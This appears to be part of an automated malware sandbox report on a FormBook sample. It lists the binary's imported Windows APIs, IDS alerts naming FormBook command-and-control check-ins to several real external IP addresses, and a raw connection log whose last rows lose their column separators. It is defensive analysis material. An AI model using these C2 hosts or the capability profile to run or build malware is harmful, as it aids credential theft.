KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain | (map image not captured)
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-08-05T15:33:46.610247+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55438 | 80 | 192.168.2.4 | 76.223.67.189
2024-08-05T15:30:29.366717+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55446 | 80 | 192.168.2.4 | 116.213.43.190
2024-08-05T15:32:44.348060+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55419 | 80 | 192.168.2.4 | 64.226.69.42
2024-08-05T15:32:24.598271+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55414 | 80 | 192.168.2.4 | 109.95.158.127
2024-08-05T15:34:41.642470+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55445 | 80 | 192.168.2.4 | 116.213.43.190
2024-08-05T15:33:11.869360+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55427 | 80 | 192.168.2.4 | 216.83.33.140
2024-08-05T15:33:33.481112+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55434 | 80 | 192.168.2.4 | 35.241.42.217
2024-08-05T15:31:37.858823+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55400 | 80 | 192.168.2.4 | 38.12.1.29
2024-08-05T15:34:06.742130+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55441 | 80 | 192.168.2.4 | 116.213.43.190
2024-08-05T15:32:32.758756+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55416 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-05T15:31:48.976689+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55403 | 80 | 192.168.2.4 | 217.116.0.191
2024-08-05T15:33:14.394961+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55428 | 80 | 192.168.2.4 | 216.83.33.140
2024-08-05T15:32:11.243024+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55410 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-05T15:33:44.056357+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55437 | 80 | 192.168.2.4 | 76.223.67.189
2024-08-05T15:33:41.525809+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55436 | 80 | 192.168.2.4 | 76.223.67.189
2024-08-05T15:31:42.990832+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55402 | 80 | 192.168.2.4 | 38.12.1.29
2024-08-05T15:34:36.179851+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55443 | 80 | 192.168.2.4 | 116.213.43.190
2024-08-05T15:33:25.855659+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55431 | 80 | 192.168.2.4 | 35.241.42.217
2024-08-05T15:32:46.883713+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55420 | 80 | 192.168.2.4 | 64.226.69.42
2024-08-05T15:34:29.154258+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55442 | 80 | 192.168.2.4 | 116.213.43.190
2024-08-05T15:33:16.945128+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55429 | 80 | 192.168.2.4 | 216.83.33.140
2024-08-05T15:32:57.776739+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55423 | 80 | 192.168.2.4 | 203.161.55.102
2024-08-05T15:32:51.923298+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55422 | 80 | 192.168.2.4 | 64.226.69.42
2024-08-05T15:33:00.271451+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55424 | 80 | 192.168.2.4 | 203.161.55.102
2024-08-05T15:31:57.075925+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55406 | 80 | 192.168.2.4 | 217.116.0.191
2024-08-05T15:33:02.853794+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55425 | 80 | 192.168.2.4 | 203.161.55.102
2024-08-05T15:32:30.095906+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55415 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-05T15:31:54.186142+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55405 | 80 | 192.168.2.4 | 217.116.0.191
2024-08-05T15:31:51.526601+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55404 | 80 | 192.168.2.4 | 217.116.0.191
2024-08-05T15:33:05.338981+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55426 | 80 | 192.168.2.4 | 203.161.55.102
2024-08-05T15:34:38.715086+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55444 | 80 | 192.168.2.4 | 116.213.43.190
2024-08-05T15:32:35.190410+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55417 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-05T15:34:04.213661+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55440 | 80 | 192.168.2.4 | 116.213.43.190
2024-08-05T15:32:07.823386+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55409 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-05T15:31:40.563497+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55401 | 80 | 192.168.2.4 | 38.12.1.29
2024-08-05T15:34:01.680859+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55439 | 80 | 192.168.2.4 | 116.213.43.190
2024-08-05T15:32:38.674646+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55418 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-05T15:33:19.469697+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55430 | 80 | 192.168.2.4 | 216.83.33.140
2024-08-05T15:32:16.991396+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55411 | 80 | 192.168.2.4 | 109.95.158.127
2024-08-05T15:33:38.983279+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55435 | 80 | 192.168.2.4 | 76.223.67.189
2024-08-05T15:31:35.346636+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55399 | 80 | 192.168.2.4 | 38.12.1.29
2024-08-05T15:33:30.940025+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55433 | 80 | 192.168.2.4 | 35.241.42.217
2024-08-05T15:32:19.546018+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55412 | 80 | 192.168.2.4 | 109.95.158.127
2024-08-05T15:32:22.070909+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55413 | 80 | 192.168.2.4 | 109.95.158.127
2024-08-05T15:31:17.205288+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 55397 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-05T15:32:05.273764+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55408 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-05T15:32:02.700047+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55407 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-05T15:32:49.398527+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55421 | 80 | 192.168.2.4 | 64.226.69.42
2024-08-05T15:33:28.389390+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 55432 | 80 | 192.168.2.4 | 35.241.42.217
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 5, 2024 15:31:16.697523117 CEST | 55397 | 80 | 192.168.2.4 | 3.33.130.190
Aug 5, 2024 15:31:16.702527046 CEST | 80 | 55397 | 3.33.130.190 | 192.168.2.4
Aug 5, 2024 15:31:16.702611923 CEST | 55397 | 80 | 192.168.2.4 | 3.33.130.190
Aug 5, 2024 15:31:16.704848051 CEST | 55397 | 80 | 192.168.2.4 | 3.33.130.190
Aug 5, 2024 15:31:16.709692001 CEST | 80 | 55397 | 3.33.130.190 | 192.168.2.4
Aug 5, 2024 15:31:17.205013990 CEST | 80 | 55397 | 3.33.130.190 | 192.168.2.4
Aug 5, 2024 15:31:17.205123901 CEST | 80 | 55397 | 3.33.130.190 | 192.168.2.4
Aug 5, 2024 15:31:17.205287933 CEST | 55397 | 80 | 192.168.2.4 | 3.33.130.190
Aug 5, 2024 15:31:17.208636999 CEST | 55397 | 80 | 192.168.2.4 | 3.33.130.190
Aug 5, 2024 15:31:17.218489885 CEST | 80 | 55397 | 3.33.130.190 | 192.168.2.4
Aug 5, 2024 15:31:34.448457956 CEST | 55399 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:34.453433990 CEST | 80 | 55399 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:34.453572035 CEST | 55399 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:34.455704927 CEST | 55399 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:34.460547924 CEST | 80 | 55399 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:35.346323013 CEST | 80 | 55399 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:35.346447945 CEST | 80 | 55399 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:35.346636057 CEST | 55399 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:35.966180086 CEST | 55399 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:36.984570980 CEST | 55400 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:36.989576101 CEST | 80 | 55400 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:36.993746996 CEST | 55400 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:36.995434046 CEST | 55400 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:37.000335932 CEST | 80 | 55400 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:37.858598948 CEST | 80 | 55400 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:37.858755112 CEST | 80 | 55400 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:37.858823061 CEST | 55400 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:38.507493973 CEST | 55400 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:39.525800943 CEST | 55401 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:39.577769041 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:39.578133106 CEST | 55401 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:39.580959082 CEST | 55401 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:39.585905075 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:39.585921049 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:39.585928917 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:39.585942030 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:39.585963011 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:39.586035013 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:39.586046934 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:39.587239027 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:39.587250948 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:40.562031031 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:40.563420057 CEST | 80 | 55401 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:40.563497066 CEST | 55401 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:41.085958004 CEST | 55401 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:42.104713917 CEST | 55402 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:42.109690905 CEST | 80 | 55402 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:42.109786034 CEST | 55402 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:42.111552954 CEST | 55402 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:42.116389036 CEST | 80 | 55402 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:42.990638018 CEST | 80 | 55402 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:42.990756989 CEST | 80 | 55402 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:42.990832090 CEST | 55402 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:42.993993044 CEST | 55402 | 80 | 192.168.2.4 | 38.12.1.29
Aug 5, 2024 15:31:42.998895884 CEST | 80 | 55402 | 38.12.1.29 | 192.168.2.4
Aug 5, 2024 15:31:48.291944981 CEST | 55403 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:48.298114061 CEST | 80 | 55403 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:48.298234940 CEST | 55403 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:48.299766064 CEST | 55403 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:48.304711103 CEST | 80 | 55403 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:48.976499081 CEST | 80 | 55403 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:48.976519108 CEST | 80 | 55403 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:48.976689100 CEST | 55403 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:49.804614067 CEST | 55403 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:50.830182076 CEST | 55404 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:50.838589907 CEST | 80 | 55404 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:50.838701963 CEST | 55404 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:50.840605974 CEST | 55404 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:50.846204042 CEST | 80 | 55404 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:51.526330948 CEST | 80 | 55404 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:51.526360989 CEST | 80 | 55404 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:51.526601076 CEST | 55404 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:52.351299047 CEST | 55404 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:53.374205112 CEST | 55405 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:53.379189968 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:53.379322052 CEST | 55405 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:53.384526968 CEST | 55405 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:53.389436960 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:53.389448881 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:53.389457941 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:53.389468908 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:53.389477968 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:53.389539957 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:53.389549971 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:53.389568090 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:53.389578104 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:54.185596943 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:54.186047077 CEST | 80 | 55405 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:54.186141968 CEST | 55405 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:54.898123026 CEST | 55405 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:55.916939974 CEST | 55406 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:56.251333952 CEST | 80 | 55406 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:56.251497984 CEST | 55406 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:56.253350019 CEST | 55406 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:56.259661913 CEST | 80 | 55406 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:57.075639009 CEST | 80 | 55406 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:57.075690031 CEST | 80 | 55406 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:57.075793982 CEST | 80 | 55406 | 217.116.0.191 | 192.168.2.4
Aug 5, 2024 15:31:57.075925112 CEST | 55406 | 80 | 192.168.2.4 | 217.116.0.191
Aug 5, 2024 15:31:57.075958967 CEST | 55406 | 80 | 192.168.2.4 | 217.116.0.191
                                                    Aug 5, 2024 15:31:57.078430891 CEST5540680192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:57.084598064 CEST8055406217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:32:02.211504936 CEST5540780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:02.216583967 CEST80554073.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:02.216701984 CEST5540780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:02.273204088 CEST5540780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:02.278250933 CEST80554073.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:02.699836969 CEST80554073.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:02.700047016 CEST5540780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:03.788918972 CEST5540780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:03.793899059 CEST80554073.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:04.807734013 CEST5540880192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:04.813055038 CEST80554083.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:04.813201904 CEST5540880192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:04.814971924 CEST5540880192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:04.819881916 CEST80554083.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:05.273565054 CEST80554083.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:05.273763895 CEST5540880192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:06.320060015 CEST5540880192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:06.324990988 CEST80554083.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.338872910 CEST5540980192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:07.344712973 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.344829082 CEST5540980192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:07.347879887 CEST5540980192.168.2.43.33.130.190
